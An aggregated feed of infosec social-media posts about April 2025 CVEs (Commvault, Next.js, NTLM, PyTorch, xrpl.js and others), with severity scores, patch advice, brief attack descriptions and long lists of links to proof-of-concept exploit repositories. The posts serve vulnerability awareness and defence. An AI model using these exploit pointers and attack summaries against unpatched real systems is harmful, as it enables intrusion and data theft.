##Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.
updated 2025-04-23T06:31:26
1 posts
A couple CVEs in Axis Camera Station Pro.
https://www.axis.com/dam/public/e4/2e/b2/cve-2025-1056pdf-en-US-479106.pdf
sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.
https://nvd.nist.gov/vuln/detail/CVE-2025-1056
https://www.axis.com/dam/public/9d/fe/3f/cve-2025-0926pdf-en-US-479105.pdf
sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H
##Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.
updated 2025-04-23T03:30:35
1 posts
While digging into some #Fortinet vulnerabilities, I discovered a set of CVEs that were rejected for being unused.
I'm wondering how this is actually helping vulnerability management. Does this mean those will be never used? or something else?
##updated 2025-04-23T03:30:30
1 posts
Synology again.
https://www.synology.com/en-global/security/advisory/Synology_SA_25_03
sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.
I assume "unspecified vectors" is code for "basic shit we're too embarrassed to disclose."
##updated 2025-04-22T23:53:56
1 posts
1 repos
Go hack cryptocurrency shit.
https://github.com/XRPLF/xrpl.js/security/advisories/GHSA-33qr-m49q-rxfx
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##xrpl.js is a JavaScript/TypeScript API for interacting with the XRP Ledger in Node.js and the browser. Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions. Anyone who used one of these versions should stop immediately and rotate any private keys or secrets used with affected systems. Users of xrpl.js should pgrade to version 4.2.5 or 2.14.3 to receive a patch. To secure funds, think carefully about whether any keys may have been compromised by this supply chain attack, and mitigate by sending funds to secure wallets, and/or rotating keys. If any account's master key is potentially compromised, disable the key.
updated 2025-04-22T18:32:18
13 posts
2 repos
https://github.com/tinkerlev/commvault-cve2025-34028-check
https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028
Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center https://arcticwolf.com/resources/blog/cve-2025-34028/ #cybersecurity #infosec
##Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center https://arcticwolf.com/resources/blog/cve-2025-34028/ #cybersecurity #infosec
##Critical Commvault Flaw Rated 10/10: CSA Urges Immediate Patching https://thecyberexpress.com/commvault-vulnerability-cve-2025-34028/ #CommonVulnerabilityScoringSystem #CommvaultVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202534028 #CyberNews #CSA
##CVE-2025-34028, a maximum-severity #RCE #vulnerability in the Command Center, poses a severe risk to impacted instances and may result in a full system compromise. Detect exploitation attempts with #Sigma rules from SOC Prime Platform.
https://socprime.com/blog/detect-cve-2025-34028-exploitation/?utm_source=mastodon&utm_medium=social&utm_campaign=latest-threats&utm_content=blog-post
Critical vulnerability reported in Commvault Command Center
A critical unauthenticated remote code execution vulnerability (CVE-2025-34028) in Commvault's Command Center allows attackers to force vulnerable systems to download, unzip, and execute malicious code, leading to complete system compromise. The flaw affects Commvault Command Center Innovation Release versions 11.38.0-11.38.19 on both Windows and Linux.
**If you are using Commvault Command Center Innovation Release versions 11.38.0 to 11.38.19, patch IMMEDIATELY. Naturally, make sure the system is isolated from the internet and accessible only from trusted networks. But even with isolation, someone will find your Commvault eventually - through phishing or malware. So don't delay - patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-vulnerability-reported-in-commvault-command-center-5-w-t-6-u/gD2P6Ple2L
Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028) https://fortiguard.fortinet.com/threat-signal-report/6081
##CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE – Source: socprime.com https://ciso2ciso.com/cve-2025-34028-detection-a-maximum-severity-vulnerability-in-the-commvault-command-center-enables-rce-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #CVE-2025-34028 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE #rce
##New.
WatchTower: Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
More:
Infosecurity-Magazine: Highest-Risk Security Flaw Found in Commvault Backup Solutions https://www.infosecurity-magazine.com/news/critical-vulnerability-commvault/ #cybersecurity #Infosec
##Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) https://www.helpnetsecurity.com/2025/04/24/critical-commvault-rce-vulnerability-fixed-poc-available-cve-2025-34028/ #dataprotection #vulnerability #Don'tmiss #Commvault #WatchTowr #Hotstuff #backup #News #PoC
##Yet another good write-up by watchTowr Labs. This time it was with Commvault. So patch it if you have it, hack it if you don't. And vendors: Take note of the communication and turnaround time in here.
Edit to fix a dumb typo.
##Whoa, that Commvault SSRF to RCE vulnerability is *ugly*! 😬 We're talking CVE-2025-34028, slapped with a 9.0 CVSS score. Yeah, that's definitely setting off all the alarm bells!
Here's the lowdown: An SSRF vulnerability in "deployWebpackage.do" isn't being filtered properly. What does that mean? Attackers can just upload a ZIP file containing a JSP payload, and *boom* – they get remote code execution. It's a stark reminder that backup systems, unfortunately, are often prime targets precisely because they get overlooked.
So, listen up: If you're running Commvault Command Center versions anywhere from 11.38.0 up to 11.38.19, you need to patch immediately. Get yourself onto version 11.38.20 or 11.38.25 right away! And while you're at it, take a good look at your configuration settings. Good news is, watchTowr Labs has put out a detection tool – definitely make use of that!
Just a friendly reminder on best practices, too: Your backup systems absolutely belong in their own, separate network segment. Crucially, regular penetration tests are a must; don't just rely on automated scans, they simply won't cut it for stuff like this. That's just how it is. 🤷
How about you? Got Commvault deployed? Have you already checked your setup against this vulnerability? What kind of hardening measures do you have in place for your backup infrastructure? Drop your thoughts below! 👇
##Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) - watchTowr Labs https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
##It feels like it's been a while since we've had a perfect 10 ../ and I'm glad we have another one to celebrate. 🥳
https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution.
https://nvd.nist.gov/vuln/detail/CVE-2025-34028
Edit for dumb typo.
##updated 2025-04-22T15:31:59
2 posts
Authentication bypass vulnerability reported in HPE Performance Cluster Manager (HPCM)
Authentication bypass vulnerability in HPE Performance Cluster Manager (CVE-2025-27086, CVSS 8.1) allows attackers to exploit Remote Method Invocation in the GUI component to gain unauthorized privileged access to affected systems (version 1.12 and earlier). HPE is recommending immediate upgrade to version 1.13 or implementing a temporary mitigation - disabling the vulnerable RMI service.
**If you are running HPE Clusters and are using HPE Performance Cluster Manager, time to patch it ASAP. Although the flaw is not scored as critical, an authentication bypass to the Cluster Manager can be a nasty vector of attack. Naturally, make sure it's only accessible from isolated and trusted networks. Then patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/authentication-bypass-vulnerability-reported-in-hpe-performance-cluster-manager-hpcm-n-p-l-d-c/gD2P6Ple2L
Remote auth bypass in HPE Performance Cluster Manager.
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbcr04842en_us
sev:HIGH 8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
##Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM).This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.
updated 2025-04-22T15:30:58
2 posts
Multiple vulnerabilities reported in IBM Hardware Management Console
IBM has patched multiple security vulnerabilities in its Power Hardware Management Console (HMC), including a critical flaw (CVE-2025-1950, CVSS 9.3) that allows local users to execute commands with elevated privileges due to improper validation.
**First, make sure your IBM Hardware Management Console (HMC) is isolated and accessible only from trusted networks and trusted personnel. Also check whether you are running vulnerable versions (V10.2.1030.0 and V10.3.1050.0). If you are, plan a patch cycle, because any isolation will eventually be breached.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/multiple-vulnerabilities-reported-in-ibm-hardware-management-console-n-n-l-r-j/gD2P6Ple2L
Heads-up if you or your target run IBM Hardware Management Console.
https://www.ibm.com/support/pages/node/7231507
sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.
https://nvd.nist.gov/vuln/detail/CVE-2025-1950
https://www.ibm.com/support/pages/node/7231389
sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
##IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.
updated 2025-04-22T03:30:32
1 posts
Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
##updated 2025-04-21T21:55:34
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-21T21:55:26
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-21T21:55:19
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-21T17:15:24.117000
1 posts
Preauth code exec in an IAM platform sounds fun.
https://bookstack.soffid.com/books/security-advisories/page/cve-2025-32408
sev:HIGH 8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
##In Soffid Console 3.5.38 before 3.5.39, necessary checks were not applied to some Java objects. A malicious agent could possibly execute arbitrary code in the Sync Server and compromise security.
updated 2025-04-21T14:23:45.950000
1 posts
This is an interesting vuln in Sonos API.
https://github.com/larlarua/vulnerability-reports/blob/main/CVE-2025-43916/detail.md
sev:LOW 3.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N
Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."
https://nvd.nist.gov/vuln/detail/CVE-2025-43916
What's interesting to me is in the description:
This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."
A quick search for that string only returned this CVE so I don't know if it's a pending CVE or what but it might be worth watching for if you play around with Sonos things.
##updated 2025-04-21T14:23:45.950000
1 posts
I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.
https://nvd.nist.gov/vuln/detail/CVE-2025-43970
https://nvd.nist.gov/vuln/detail/CVE-2025-43971
##updated 2025-04-20T00:31:48
1 posts
CVE published for that ssl dot com oopsie.
https://bugzilla.mozilla.org/show_bug.cgi?id=1961406
##SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.
updated 2025-04-19T15:30:28
1 posts
What's that, @Dio9sys and @da_667 ? You want more Tenda? How about a couple sev:CRIT
ones mixed in?
https://github.com/02Tn/vul/issues
##updated 2025-04-19T15:30:23
1 posts
What's that, @Dio9sys and @da_667 ? You want more Tenda? How about a couple sev:CRIT
ones mixed in?
https://github.com/02Tn/vul/issues
##updated 2025-04-18T18:34:25
2 posts
Critical remote code execution flaw reported in PyTorch Framework
The PyTorch machine learning framework contains a critical Remote Code Execution vulnerability (CVE-2025-32434, CVSS 9.3) affecting versions up to 2.5.1, which allows attackers to bypass the `weights_only=True` protection parameter when loading models, potentially executing arbitrary code.
**If you are using PyTorch, especially for loading third party potentially unsafe models, update your PyTorch to the latest version. Alternatively, find other ways to load models because weights_only=True parameter in the torch.load() is not safe now.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-remote-code-execution-flaw-reported-in-pytorch-framework-q-d-g-r-7/gD2P6Ple2L
Hackers Can Now Exploit AI Models via PyTorch – Critical Bug Found https://thecyberexpress.com/pytorch-vulnerability-cve-2025-32434/ #PyTorchVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202532434 #MLsecurity #CyberNews #AImodels
##updated 2025-04-18T15:31:44
2 posts
Urgent security alert for Active! mail users! A critical vulnerability (CVE-2025-42599) was exploited in zero-day attacks for over 8 months. Find out if you're affected and what steps to take now. Don't wait!
#SecurityLand #BreachBreakdown #ActiveMail #Security #ZeroDay #Cybersecurity #Vulnerability
##Active! Mail remote code execution flaw actively exploited
Japanese web-based email client Active! Mail contains a critical stack-based buffer overflow vulnerability (CVE-2025-42599, CVSS 9.8) that allows unauthenticated attackers to execute arbitrary code remotely. The flaw is currently being actively exploited against Japanese organizations impacting approximately 11 million accounts, prompting Qualitia to release version 6.60.06008562 as an urgent security patch.
**If you are running Active! Mail webmail based service, disable it immediately and start patching. Because hackers are actively attacking it. You can try to mitigate the issue by blocking multipart/form-data headers, but that's not really a fix. Better to disable it fully, patch, then reactivate the service.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/active-mail-remote-code-execution-flaw-actively-exploited-u-h-r-8-r/gD2P6Ple2L
updated 2025-04-18T14:15:17.677000
4 posts
3 repos
https://github.com/helidem/CVE-2025-24054-PoC
Windows – CVE-2025-24054 : cet exploit NTLM est utilisé pour cibler entreprises et gouvernements https://www.it-connect.fr/windows-cve-2025-24054-cet-exploit-ntlm-est-utilise-pour-cibler-entreprises-et-gouvernements/ #ActuCybersécurité #Cybersécurité #Phishing #Windows #NTLM
##There is quite a bit of buzz related to CVE-2025-24054 which covers attackers causing victims to leak NTLM hashes if they open certain files or view certain directories. In short, this forces victims running Windows to make a connection to an attacker controlled SMB share.
Note: A patch was provided by Microsoft on March 11.
If you prevent SMB traffic from leaving your networks then you don't have to worry about this unless the attacker has already setup shop in your network. Like, patch anyway but, IMO, it would be a better use of your time to ensure that outbound SMB is blocked first. Don't forget to account for mobile devices that are off-network.
Reference:
Check Point - CVE-2025-24054, NTLM Exploit in the Wild
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
Man, what a week! 😅 Those supposedly "harmless" clicks... seriously, sometimes it's enough to make you wanna weep.
Sure, the big, flashy exploits grab the headlines. But honestly? More often than not, it's a simple dodgy config or a user clicking way too fast that really opens the door.
Working as a pentester, I see this play out constantly: those little slip-ups are frequently the most dangerous ones. It’s why you *definitely* need to keep CVE-2025-24054 on your radar and get it patched ASAP!
And folks, seriously – *never* blindly run random Python code someone just emails you out of the blue! (Yeah, we see you, potential state-sponsored actors 😉).
What about you? Got any war stories about these seemingly "small" attack vectors? Let's hear 'em! Share your experiences below. 👇
##Heads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.
This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.
The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.
What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.
Full breakdown from Check Point here:
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow
##updated 2025-04-15T21:31:48
1 posts
Critical authentication flaw reported in Lantronix Xport
The Lantronix Xport devices contain a critical authentication bypass vulnerability (CVE-2025-2567, CVSS 9.8) affecting versions 6.5.0.7 through 7.0.0.3 that allows remote attackers to access the configuration interface without credentials, potentially enabling disruption of critical infrastructure and creating safety hazards in fuel operations.
**If you are using Lantronix Xport devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-flaw-reported-in-lantronix-xport-c-7-8-8-g/gD2P6Ple2L
updated 2025-04-15T18:39:27.967000
1 posts
Infinite loop DoS in Amazon dot IonDotnet.
https://aws.amazon.com/security/security-bulletins/AWS-2025-009/
sev:MED 5.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
##A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
updated 2025-04-15T18:31:58
1 posts
Lulz. Remember the brouhaha about the "vulnerability" in WinRAR for not preserving the Mark-of-the-Web when extracting files from downloaded archives? Well, guess what WinZIP does.
"CVE-2025-33028 - WinZip Mark-of-the-Web Bypass Vulnerability":
https://github.com/EnisAksu/Argonis/blob/main/CVEs/CVE-2025-33028%20%28WinZip%29/CVE-2025-33028.md
##updated 2025-04-11T15:39:52.920000
1 posts
Critical flaw reported in InstaWP Connect WordPress plugin
The InstaWP Connect WordPress plugin contains a critical Local File Inclusion vulnerability (CVE-2025-2636, CVSS 9.8) in versions up to 0.1.0.85 that allows unauthenticated attackers to execute arbitrary PHP files, potentially leading to complete website compromise. Administrators should update to version 0.1.0.86 or later.
**If you have installed InstaWP Connect WordPress plugin, update it NOW. The update is trivial, and it's much easier to update a plugin and sleep easy than to worry whether you can be hacked.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-flaw-reported-in-instawp-connect-wordpress-plugin-0-x-2-p-8/gD2P6Ple2L
updated 2025-04-11T15:39:52.920000
1 posts
Palo Alto updated this vulnerability yesterday.
CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (moderate) https://security.paloaltonetworks.com/CVE-2025-0120 #PaloAlto #cybersecurity #infosec
##updated 2025-04-10T01:59:49
2 posts
4 repos
https://github.com/peiqiF4ck/WebFrameworkTools-5.1-main
https://github.com/verylazytech/CVE-2025-3248
Go hack more AI shit.
Go hack more AI shit.
https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow
##CVE-2025-3248: RCE vulnerability in Langflow – Source: securityboulevard.com https://ciso2ciso.com/cve-2025-3248-rce-vulnerability-in-langflow-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard
##updated 2025-04-08T18:34:49
4 posts
Glad we got this out of the way.
PC World: Windows 11’s crucial new ‘inetpub’ folder, created to patch CVE-2025-21204, is laughably easy to hack https://www.pcworld.com/article/2761626/windows-11s-crucial-new-inetpub-folder-is-laughably-easy-to-hack.html @pcworld #cybersecurity #infosec #Microsoft #Windows
##@GossiTheDog Are you sure the writeup for CVE-2025-21204 you linked is good? It seems superficially reasonable but looks very confusing on closer inspection, in a way that suggests it may be AI-generated.
But I'm not that confident in our assessment here, and will probably trust your judgement if you say it looks reasonable - we don't do too much Windows stuff
##My recent linking a CVE-2025-21204 PoC is in fact BS. Deeper inspection of the PoC demonstrated no connection between the code and C:\inetpub, and what's more, the "evidence" didn't show privilege escalation.
I had concerns this was LLM crap, and I should have trusted those instincts.
##I've written about how Microsoft's fix for a symlink vulnerability introduces another symlink vulnerability, where all users (including non-admins) can stop all future Windows OS security patches https://doublepulsar.com/microsofts-patch-for-cve-2025-21204-symlink-vulnerability-introduces-another-symlink-vulnerability-9ea085537741
##updated 2025-04-08T18:34:48
1 posts
2 repos
https://github.com/groshi215/CVE-2024-48887-Exploit
https://github.com/cybersecplayground/CVE-2024-48887-FortiSwitch-Exploit
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2025-03-28T15:32:59
1 posts
81 repos
https://github.com/lediusa/CVE-2025-29927
https://github.com/jmbowes/NextSecureScan
https://github.com/Neoxs/nextjs-middleware-vuln-poc
https://github.com/goncalocsousa1/CVE-2025-29927
https://github.com/fahimalshihab/NextBypass
https://github.com/t3tra-dev/cve-2025-29927-demo
https://github.com/0x0Luk/0xMiddleware
https://github.com/pouriam23/Next.js-Middleware-Bypass-CVE-2025-29927-
https://github.com/Naveen-005/Next.Js-middleware-bypass-vulnerability-CVE-2025-29927
https://github.com/Oyst3r1ng/CVE-2025-29927
https://github.com/aydinnyunus/CVE-2025-29927
https://github.com/nocomp/CVE-2025-29927-scanner
https://github.com/furmak331/CVE-2025-29927
https://github.com/nyctophile0969/CVE-2025-29927
https://github.com/kuzushiki/CVE-2025-29927-test
https://github.com/m2hcz/m2hcz-Next.js-security-flaw-CVE-2025-29927---PoC-exploit
https://github.com/gotr00t0day/CVE-2025-29927
https://github.com/RoyCampos/CVE-2025-29927
https://github.com/sn1p3rt3s7/NextJS_CVE-2025-29927
https://github.com/pickovven/vulnerable-nextjs-14-CVE-2025-29927
https://github.com/kOaDT/poc-cve-2025-29927
https://github.com/lem0n817/CVE-2025-29927
https://github.com/yuzu-juice/CVE-2025-29927_demo
https://github.com/darklotuskdb/nextjs-CVE-2025-29927-hunter
https://github.com/enochgitgamefied/NextJS-CVE-2025-29927
https://github.com/iSee857/CVE-2025-29927
https://github.com/ayato-shitomi/WebLab_CVE-2025-29927
https://github.com/ticofookfook/poc-nextjs-CVE-2025-29927
https://github.com/ethanol1310/POC-CVE-2025-29927-
https://github.com/w2hcorp/CVE-2025-29927-PoC
https://github.com/nicknisi/next-attack
https://github.com/UNICORDev/exploit-CVE-2025-29927
https://github.com/c0dejump/CVE-2025-29927-check
https://github.com/AnonKryptiQuz/NextSploit
https://github.com/Knotsecurity/CVE-2025-29927-NextJs-Middleware-Simulation
https://github.com/aleongx/CVE-2025-29927
https://github.com/Slvignesh05/CVE-2025-29927
https://github.com/yugo-eliatrope/test-cve-2025-29927
https://github.com/azu/nextjs-cve-2025-29927-poc
https://github.com/ThemeHackers/CVE-2025-29972
https://github.com/Kamal-418/Vulnerable-Lab-NextJS-CVE-2025-29927
https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
https://github.com/elshaheedy/CVE-2025-29927-Sigma-Rule
https://github.com/EQSTLab/CVE-2025-29927
https://github.com/alihussainzada/CVE-2025-29927-PoC
https://github.com/0xcucumbersalad/cve-2025-29927
https://github.com/alastair66/CVE-2025-29927
https://github.com/ferpalma21/Automated-Next.js-Security-Scanner-for-CVE-2025-29927
https://github.com/Heimd411/CVE-2025-29927-PoC
https://github.com/MuhammadWaseem29/CVE-2025-29927-POC
https://github.com/fourcube/nextjs-middleware-bypass-demo
https://github.com/dante01yoon/CVE-2025-29927
https://github.com/mhamzakhattak/CVE-2025-29927
https://github.com/Eve-SatOrU/POC-CVE-2025-29927
https://github.com/BilalGns/CVE-2025-29927
https://github.com/Gokul-Krishnan-V-R/cve-2025-29927
https://github.com/Ademking/CVE-2025-29927
https://github.com/0xPThree/next.js_cve-2025-29927
https://github.com/6mile/nextjs-CVE-2025-29927
https://github.com/pixilated730/NextJS-Exploit-
https://github.com/maronnjapan/claude-create-CVE-2025-29927
https://github.com/TheresAFewConors/CVE-2025-29927-Testing
https://github.com/websecnl/CVE-2025-29927-PoC-Exploit
https://github.com/Nekicj/CVE-2025-29927-exploit
https://github.com/arvion-agent/next-CVE-2025-29927
https://github.com/jeymo092/cve-2025-29927
https://github.com/Grand-Moomin/Vuln-Next.js-CVE-2025-29927
https://github.com/strobes-security/nextjs-vulnerable-app
https://github.com/serhalp/test-cve-2025-29927
https://github.com/YEONDG/nextjs-cve-2025-29927
https://github.com/l1uk/nextjs-middleware-exploit
https://github.com/Jull3Hax0r/next.js-exploit
https://github.com/0xWhoknows/CVE-2025-29927
https://github.com/Balajih4kr/cve-2025-29927
https://github.com/aleongx/CVE-2025-29927_Scanner
https://github.com/kh4sh3i/CVE-2025-29927
https://github.com/takumade/ghost-route
https://github.com/narasimhauppala/nextjs-middleware-bypass
https://github.com/ValGrace/middleware-auth-bypass
Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) http://www.kitploit.com/2025/04/ghost-route-ghost-route-detects-if-next.html
##updated 2025-03-28T15:32:58
1 posts
ASUS releases fix for AMI bug that lets hackers brick servers
ASUS has released security updates to address CVE-2024-54085, a maximum severity flaw that could allow attackers to hijack and potentially brick...
🔗️ [Bleepingcomputer] https://link.is.it/ky8mNl
##updated 2025-03-25T15:10:16
1 posts
17 repos
https://github.com/Esonhugh/ingressNightmare-CVE-2025-1974-exps
https://github.com/yoshino-s/CVE-2025-1974
https://github.com/zulloper/CVE-2025-1974
https://github.com/hi-unc1e/CVE-2025-1974-poc
https://github.com/tuladhar/ingress-nightmare
https://github.com/yanmarques/CVE-2025-1974
https://github.com/gian2dchris/ingress-nightmare-poc
https://github.com/0xBingo/CVE-2025-1974
https://github.com/zwxxb/CVE-2025-1974
https://github.com/sandumjacob/IngressNightmare-POCs
https://github.com/m-q-t/ingressnightmare-detection-poc
https://github.com/hakaioffsec/IngressNightmare-PoC
https://github.com/lufeirider/IngressNightmare-PoC
https://github.com/Ar05un05kau05ndal/2025-1
https://github.com/dttuss/IngressNightmare-RCE-POC
https://github.com/Rubby2001/CVE-2025-1974-go
https://github.com/rjhaikal/POC-IngressNightmare-CVE-2025-1974
Fortinet: IngressNightmare: Understanding CVE‑2025‑1974 in Kubernetes Ingress-NGINX https://www.fortinet.com/blog/threat-research/ingressnightmare-understanding-cve-2025-1974-in-kubernetes-ingress-nginx @fortinet #cybersecurity #Infosec #Kubernetes
##updated 2025-03-11T18:32:12
1 posts
3 repos
https://github.com/demining/Bluetooth-Attacks-CVE-2025-27840
CVE-2025-27840: How a Tiny ESP32 Chip Could Crack Open Bitcoin Wallets Worldwide https://securityonline.info/cve-2025-27840-how-a-tiny-esp32-chip-could-crack-open-bitcoin-wallets-worldwide/
##updated 2025-03-10T23:15:35.073000
6 posts
Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) https://www.helpnetsecurity.com/2025/04/25/rack-ruby-vulnerability-could-reveal-secrets-to-attackers-cve-2025-27610/ #webapplicationsecurity #securityupdate #vulnerability #Don'tmiss #Hotstuff #OPSWAT #News #Ruby
##Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.
